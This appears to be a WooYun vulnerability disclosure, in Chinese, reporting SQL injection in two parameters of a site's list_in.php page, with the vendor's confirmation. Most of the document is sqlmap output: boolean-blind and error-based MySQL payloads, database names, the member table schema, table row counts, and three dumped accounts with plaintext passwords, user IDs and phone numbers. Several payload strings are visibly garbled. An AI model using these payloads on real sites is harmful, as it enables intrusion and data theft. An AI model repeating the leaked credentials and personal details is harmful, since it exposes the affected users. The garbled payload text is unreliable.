乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-21: 细节已通知厂商并且等待厂商处理中 2016-01-21: 厂商已经确认,细节仅向厂商公开 2016-01-31: 细节向核心白帽子及相关领域专家公开 2016-02-10: 细节向普通白帽子公开 2016-02-20: 细节向实习白帽子公开 2016-03-05: 细节向公众公开
123
注入:
http://**.**.**.**/ally/list_in.php?ID=181&res_number=U2013061822564
两个参数都存在注入:
Place: GETParameter: ID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=181 AND 7278=7278&res_number=U2013061822564 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: ID=181 AND (SELECT 8737 FROM(SELECT COUNT(*),CONCAT(0x3a626b713ELECT (CASE WHEN (8737=8737) THEN 1 ELSE 0 END)),0x3a6378713a,FLOOR(RAND(0)* FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&res_number=U2013061822Place: GETParameter: res_number Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: ID=181&res_number=U2013061822564' AND (SELECT 7111 FROM(SELECTT(*),CONCAT(0x3a626b713a,(SELECT (CASE WHEN (7111=7111) THEN 1 ELSE 0 END)),6378713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY AND 'eyTV'='eyTV---there were multiple injection points, please select the one to use for follo injections:[0] place: GET, parameter: ID, type: Unescaped numeric (default)[1] place: GET, parameter: res_number, type: Single quoted string[q] Quit>[15:55:51] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0[15:55:51] [INFO] fetching current user[15:55:52] [INFO] retrieved: yesoneco_yesone@localhostcurrent user: 'yesoneco_yesone@localhost'
available databases [16]:[*] information_schema[*] yesoneco_adminuser[*] yesoneco_ally[*] yesoneco_design[*] yesoneco_member[*] yesoneco_new2015[*] yesoneco_news[*] yesoneco_qa[*] yesoneco_slds[*] yesoneco_tool[*] yesoneco_web[*] yesoneco_webdb[*] yesoneco_webdb2[*] yesoneco_webdb_test[*] yesoneco_webpage[*] yesoneco_yestop
Table: member[15 columns]+-----------------+------------------+| Column | Type |+-----------------+------------------+| date | datetime || ID | int(11) unsigned || number | text || tel_header | varchar(100) || user_cell_phone | varchar(100) || user_cell_tel | varchar(100) || user_email | varchar(100) || user_how_know | varchar(100) || user_lastName | varchar(100) || user_male | varchar(100) || user_man | varchar(100) || user_passwd | varchar(100) || user_rank | varchar(100) || user_userid | varchar(100) || web | varchar(100) |+-----------------+------------------+3个管理员明文密码<code>[3 entries]+---------------------+-----+----------------+------------+-----------------+---------------+-----------------------+---------------+---------------+-----------+----------+-------------+-----------+-------------+------+| date | ID | number | tel_header | user_cell_phone | user_cell_tel | user_email | user_how_know | user_lastName | user_male| user_man | user_passwd | user_rank | user_userid | web |+---------------------+-----+----------------+------------+-----------------+---------------+-----------------------+---------------+---------------+-----------+----------+-------------+-----------+-------------+------+| NULL | 130 | U2013052877021 | NULL | NULL | NULL | NULL | NULL | ??? | M| 2 | q123456 | 1 | yesone91 | NULL || 2013-07-22 16:26:32 | 132 | U2013061822564 | 02 | 0229925205 | 29925205 | DoMo4690@**.**.**.** | ?????? | ?? | F| 0 | 821228 | NULL | yesone123 | 2 || 2013-08-01 18:36:00 | 134 | U2013080155471 | 02 | 0918965658 | 2921578 | **.**.**.**@**.**.**.** | ?????? | ??? | M| 2 | 00882299 | NULL | wei70 | NULL |+---------------------+-----+----------------+------------+-----------------+---------------+-----------------------+---------------+---------------+-----------+----------+-------------+-----------+-------------+------+
接近2000用户
Database: yesoneco_member+--------+---------+| Table | Entries |+--------+---------+| member | 1876 |+--------+---------+
Database: yesoneco_webdb+----------+---------+| Table | Entries |+----------+---------+| customer | 619 |+----------+---------+
又测漏49admin
Database: yesoneco_webdb+-------+---------+| Table | Entries |+-------+---------+| admin | 49 |+-------+---------+
订单
Database: yesoneco_webdb+----------+---------+| Table | Entries |+----------+---------+| ORDER_TB | 4436 |+----------+---------+
危害等级:高
漏洞Rank:18
确认时间:2016-01-21 22:58
感謝通報!
暂无